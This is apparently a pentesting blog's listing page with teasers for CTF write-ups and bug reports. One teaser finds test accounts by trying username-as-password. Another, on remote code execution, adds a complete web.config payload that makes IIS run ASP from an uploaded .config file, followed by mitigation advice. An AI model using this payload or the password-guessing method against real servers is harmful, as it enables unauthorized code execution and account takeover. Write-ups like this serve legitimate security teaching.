Pentesting

H1-702 CTF ~ Write-Up

H1-702 CTF. Sections: Introduction, Start, Dirbuster, Readme, Json Web Token, Versioning, Hidden, Enumerate, Final steps. Introduction: My last two weeks of being occupied began with this simple tweet from Jobert Abma: “Hackers, we’ve built a mobile […]

How I discovered 1500+ test accounts

TL;DR: By using the search function in the mail application with an empty search string, I retrieved all the usernames and then checked for each one whether the password was the same as the username. By filtering […]

RCE by uploading a web.config

TL;DR: By uploading a web.config I was able to bypass the blacklist, which blocks files with executable extensions (such as ‘.asp’ and ‘.aspx’). After setting execution rights for ‘.config’ and then adding ASP code […]
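The technique this TL;DR describes, shown as an added example rather than the author's own payload: a web.config that registers the classic ASP ISAPI handler for `*.config` (the "execution rights"), lifts IIS request filtering's default refusal to serve `web.config` and `.config` files, and carries ASP code hidden inside an XML comment so the file remains well-formed XML for IIS. The handler name, the `asp.dll` path and the output string are assumptions; the real path depends on the target's IIS installation and classic ASP must be installed for `asp.dll` to exist.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Map *.config to the classic ASP ISAPI extension so this file is executed, not served. -->
    <!-- Assumed handler name and dll path; adjust to the target's IIS install. -->
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config_asp" path="*.config" verb="*"
           modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- By default IIS refuses to serve .config files and the web.config segment;
             both refusals are lifted here so the upload is reachable over HTTP. -->
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")   ' closes the comment in the rendered output
   Response.write("ASP executed from web.config (assumed marker string)")
%>
-->
```

When IIS reads the file as configuration it sees valid XML with a trailing comment; when the same URL is requested and routed to `asp.dll`, the `<% %>` block runs and the first `Response.write` emits `-->` so the rest of the output is not swallowed by the literal `<!--` preceding it. The practitioner's check on the defensive side: an extension blacklist is the wrong control here, since `.config` is not an "executable" extension until this file makes it one. Use an allowlist of permitted extensions, store uploads outside the web root (or serve them through a handler that never executes content), and lock the `handlers` and `requestFiltering` sections for the upload directory in applicationHost.config with a `<location>` element set to `overrideMode="Deny"`, so a web.config dropped there cannot redefine them.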

H1-212 CTF ~ Write-Up